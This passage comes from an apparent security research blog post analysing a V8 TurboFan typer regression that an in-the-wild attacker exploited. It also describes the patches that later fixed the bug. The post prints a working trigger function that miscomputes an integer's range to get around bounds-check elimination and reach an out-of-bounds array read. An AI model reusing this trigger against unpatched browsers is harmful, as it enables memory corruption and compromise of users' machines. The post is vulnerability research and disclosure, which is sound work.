Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:

-0

+

0

=>

-0

[string]

-

0

=>

[number]

[object]

+

0

=>

[string]

As a result, the patched function provides us with an even wider choice of possible “type confusions”.

It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found this excellent blog post written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.

We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.

Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:

function trigger(arg) {

  // Initially:

  // actual = 1, inferred = any

  var k = 0;

 

  arg = arg | 0;

  // After step one:

  // actual = 1, inferred = [-0x80000000, 0x7fffffff]

 

  arg = Math.min(arg, 2);

  // After step two:

  // actual = 1, inferred = [-0x80000000, 2]

 

  arg = Math.max(arg, 1);

  // After step three:

  // actual = 1, inferred = [1, 2]

 

  if (arg == 1) {

    arg = "30";

  }

  // After step four:

  // actual = string{30}, inferred = [1, 2] or string{30}

 

  for (var i = arg; i < 0x1000; i -= 0) {

    if (++k > 1) {

      break;

    }

  }

  // After step five:

  // actual = number{30}, inferred = [1, 2] or string{30}

 

  i += 1;

  // After step six:

  // actual = 31, inferred = [2, 3]

 

  i >>= 1;

  // After step seven:

  // actual = 15, inferred = 1

 

  i += 2;

  // After step eight:

  // actual = 17, inferred = 3

 

  i >>= 1;

  // After step nine:

  // actual = 8, inferred = 1

  var array = [0.1, 0.1, 0.1, 0.1];

  return [array[i], array];

}

The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.

Patch 3

Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:

  • Extended element access hardening, which now prevents the abuse of NumberLessThan nodes.
  • Discovered and fixed a similar problem with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.
  • Implemented a verifier for induction variables that validates the computed type against the more conservative regular phi typing.

Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.

Conclusion

This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and, quite often even the slightest issue in the typer is enough to build a powerful and reliable exploit.

Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in the class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.

❌